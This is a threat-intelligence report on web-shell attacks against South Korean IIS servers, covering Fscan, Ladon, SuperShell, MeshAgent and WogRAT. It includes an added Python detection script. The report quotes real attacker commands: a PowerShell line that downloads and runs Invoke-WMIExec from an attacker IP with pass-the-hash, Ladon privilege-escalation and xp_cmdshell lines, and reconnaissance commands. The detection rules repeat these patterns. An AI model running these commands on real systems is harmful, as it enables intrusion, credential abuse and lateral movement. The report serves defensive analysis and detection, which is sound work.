Case of Attacks Targeting South Korean Web Servers Using MeshAgent and SuperShell
Lately, attacks on South Korean web servers utilizing MeshAgent and SuperShell have been identified. The presence of ELF-based malware at the malicious code distribution address suggests that the attackers are targeting not only Windows servers but also Linux servers. It is assumed that the attackers installed a web shell using a file upload vulnerability and used it to install additional payloads. Through reconnaissance and lateral movement, the attackers attempted to infect not only the compromised system but also other systems within the organization.
The malicious code distribution address used in the attacks also contained WogRAT. Similar to Rekoobe, WogRAT is a backdoor malware that was developed by referencing the routine of an open-source malware called “Tiny SHell.” The fact that the C&C server address of the recently identified WogRAT is the same as that of the WogRAT used in the past attack cases that exploited aNotepad suggests that both cases were likely carried out by the same attacker.
Most of the malware, including the web shell used in the attacks, are public tools. Therefore, based on the tools used, the attackers can only be identified in terms of the association between the two cases. However, it is noteworthy that malware like Ladon, Fscan, MeshAgent, and SuperShell have been commonly used tools by Chinese-speaking attackers in the past.

Figure 1. Flowchart
1. Initial Access
The initial access vector is unknown, but the presence of web shells in the following paths indicates that the attack exploited file upload vulnerabilities in the web server. The attacker used the installed web shells to run reconnaissance commands and install additional payloads.
D:\WEB\*******\******\Data\Editor\File\g.asp
D:\WEB\*******\******\Data\Editor\File\test6\aa.asp
D:\WEB\*******\******\Data\Editor\File\test6\ab.asp
D:\WEB\*******\******\Data\Editor\File\test9\1.aspx
D:\WEB\*******\******\Data\Editor\File\test9\1.aspx
D:\WEB\*******\******\Data\Editor\File\test9\tunnel1.aspx
2. Persistence
In the initial penetration stage, attackers install web shells to control the compromised system and use them to maintain persistent command execution. As the target is a Windows IIS web server, the web shells used are all in ASP and ASPX formats. The attack logs include traces of various web shells such as Chopper, Godzilla, and reGeorg.

Figure 2. Web Shells Used in the Attack
3. Discovery
After installing the web shell, the attacker used the following commands to collect information on the infected system.
> ipconfig
> whoami
> whoami /all
> systeminfo
> netstat -ano
> query user
> tasklist /svc
> ping -nc 1 [IP Address]
The attacker then scanned the network, including the infected system, using Fscan.
> fscan.exe -hf i.txt -nocolor -silent -o rr8.txt
> fscan.exe -hf a.txt -nocolor -silent -p 445,135,22 -o rr6.txt

Figure 3. Fscan Tool Developed in Chinese
4. Privilege Escalation
During the privilege escalation process, Ladon was abused. Ladon is also a tool mainly used by Chinese-speaking attackers. It supports various functions required for the attack process, so attackers can use Ladon to perform various malicious activities such as scanning, privilege escalation, and stealing account information after taking over the victim system. In addition to the executable file format of Ladon, there is also PowerLadon written in PowerShell. PowerLadon was used in the attack case.
Attackers tend to use privilege escalation malware even when they can already run commands on the infected system through a web shell, because the w3wp.exe process does not have the required permissions. In this attack case, the attackers used the SweetPotato command supported by Ladon to escalate privileges.
> powershell -exec bypass Import-Module .\Ladon.ps1;Ladon SweetPotato whoami
5. Command and Control
The attacker installed SuperShell and MeshAgent besides the web shell to control the infected system. The attacker also installed a proxy tool. SuperShell is developed in Go language and supports various platforms including Windows, Linux, and Android. Its main function is a reverse shell, allowing the attacker to remotely control the infected system. SuperShell has been exploited in cases of attacks against Linux servers with improper management, and cases of APT attackers like UNC5174 using it have been reported. [1] [2]

Figure 4. SuperShell Repository on GitHub
MeshAgent collects the system’s basic information required for remote management and provides functions such as power and account control, chat or message pop-up, file upload/download, and command execution. In addition, it supports remote desktop, especially web-based remote desktop functions such as RDP and VNC. While general users may use it to manage systems remotely, these functions can also be exploited for malicious purposes.

Figure 5. MeshAgent’s Configuration File and C&C Server
The IP address from which the attacker downloaded the malware also hosts malware targeting Linux servers. For example, SuperShell was uploaded as an ELF binary in addition to PE format malware, and WogRAT was also found there. WogRAT is a malware that was distributed in the past by exploiting aNotepad, a free online notepad platform. The malware is characterized by the string “WingsOfGod,” which the attacker used when creating it. WogRAT has both Windows and Linux versions, and the Linux version was developed by adopting the routine of an open-source malware called Tiny SHell, similar to Rekoobe. Detailed analysis of WogRAT is available on the existing blog. [3]
The fact that WogRAT’s C&C server address is the same as in the past cases suggests that the two attacks are the work of the same attacker. In the past cases, the malware was distributed under names disguised as legitimate Windows utilities, whereas in the cases confirmed here the attacker targeted vulnerable web servers.
6. Credential Access
To move laterally to infect systems and take over the network where the infected system is located, the attackers need to steal credentials. Lateral movement using WMIExec and Ladon tools has been confirmed, indicating that the attackers successfully stole credentials. Attackers may have used various methods, but one confirmed tool is Network Password Dump, which collects and shows network authentication information stored in the system.

Figure 6. Network Password Dump Tool
7. Lateral Movement
The attacker successfully obtained the NT hash of an admin account and used it to move laterally to other systems within the organization using WMIExec.
> IEX (New-Object Net.WebClient).DownloadString('hxxp://139.180.142[.]127/Invoke-WMIExec.ps1');Invoke-WMIExec -Target [IP] -Domain [Domain] -Username Administrator -Hash [Hash] -Command 'whoami' -verbose
In addition, MS-SQL Server was targeted as well. The following Ladon commands for lateral movement were identified.
> powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon Runas [User] [Password] whoami
> powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd [IP] [User] [Password] master xp_cmdshell "net user
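The following Python triage script is an added example, not part of the original report, that turns the attacker commands quoted in the Discovery, Privilege Escalation and Lateral Movement sections (Fscan, Ladon SweetPotato/Runas/MssqlCmd, Invoke-WMIExec) and the web shell paths from Initial Access into detection rules, and runs them over constructed process-creation and file-write events. The event format, rule names, and the IP address, host and hash values in the samples are all assumptions chosen for the example.

```python
import re
from collections import namedtuple

Event = namedtuple("Event", "parent image cmdline")

# Constructed events for the example. 198.51.100.7, 10.0.0.5 and PLACEHOLDER are not report IoCs.
SAMPLE_EVENTS = [
    Event("w3wp.exe", "cmd.exe", "cmd.exe /c whoami /all"),
    Event("w3wp.exe", "fscan.exe", "fscan.exe -hf a.txt -nocolor -silent -p 445,135,22 -o rr6.txt"),
    Event("w3wp.exe", "powershell.exe",
          "powershell -exec bypass Import-Module .\\Ladon.ps1;Ladon SweetPotato whoami"),
    Event("powershell.exe", "powershell.exe",
          "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/Invoke-WMIExec.ps1');"
          "Invoke-WMIExec -Target 10.0.0.5 -Username Administrator -Hash PLACEHOLDER -Command 'whoami'"),
    Event("explorer.exe", "powershell.exe", "powershell -File C:\\scripts\\backup.ps1"),
]

# (rule name, attack stage as labelled in the report, pattern over the command line)
RULES = [
    ("recon-command", "Discovery",
     re.compile(r"\b(whoami|systeminfo|ipconfig|netstat|tasklist|query user)\b", re.I)),
    ("fscan-hostfile-scan", "Discovery", re.compile(r"\bfscan(\.exe)?\b.*\s-hf\s", re.I)),
    ("ladon-sweetpotato", "Privilege Escalation", re.compile(r"\bLadon\b.*\bSweetPotato\b", re.I)),
    ("ladon-lateral", "Lateral Movement", re.compile(r"\bLadon\s+(Runas|MssqlCmd)\b", re.I)),
    ("invoke-wmiexec-pth", "Lateral Movement", re.compile(r"Invoke-WMIExec\b.*\s-Hash\b", re.I)),
    ("remote-script-load", "Command and Control", re.compile(r"DownloadString\s*\(", re.I)),
]
IIS_WORKER = "w3wp.exe"
# Server-executable script written under an editor upload directory, as in the report's web shell paths.
UPLOADED_SCRIPT = re.compile(r"\\Data\\Editor\\File\\.*\.(asp|aspx|ashx)$", re.I)


def classify(event):
    """Return [(rule, stage), ...] for one process event; an empty list means nothing matched."""
    hits = [(name, stage) for name, stage, rx in RULES if rx.search(event.cmdline)]
    # The IIS worker rarely spawns children; any child process is the strongest web shell indicator.
    if event.parent.lower() == IIS_WORKER:
        hits.insert(0, ("iis-child-process", "Persistence (web shell)"))
    return hits


def is_uploaded_script(path):
    """True when a file written under the upload directory has a server-executable extension."""
    return UPLOADED_SCRIPT.search(path) is not None


def triage(events):
    """Map event index -> hits, keeping only events that matched at least one rule."""
    return {i: hits for i, e in enumerate(events) if (hits := classify(e))}
```

In a real deployment the parent/image/command-line fields map onto Sysmon event ID 1 or Windows Security event 4688 with command-line auditing enabled, and the path check onto file-creation events for the web root.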
8. Conclusion
Recently, cases have been confirmed where attacks on Korean IIS web servers are suspected to be perpetrated by the same attacker behind the WogRAT attacks. The attacker seems to target not only Windows but also Linux, attempting to take control of the network where the infected system belongs by moving from the initial penetration phase to the lateral movement phase. While the ultimate goal is unknown, the attacker may steal sensitive information or infect the network with ransomware if they successfully take control of the organization’s network.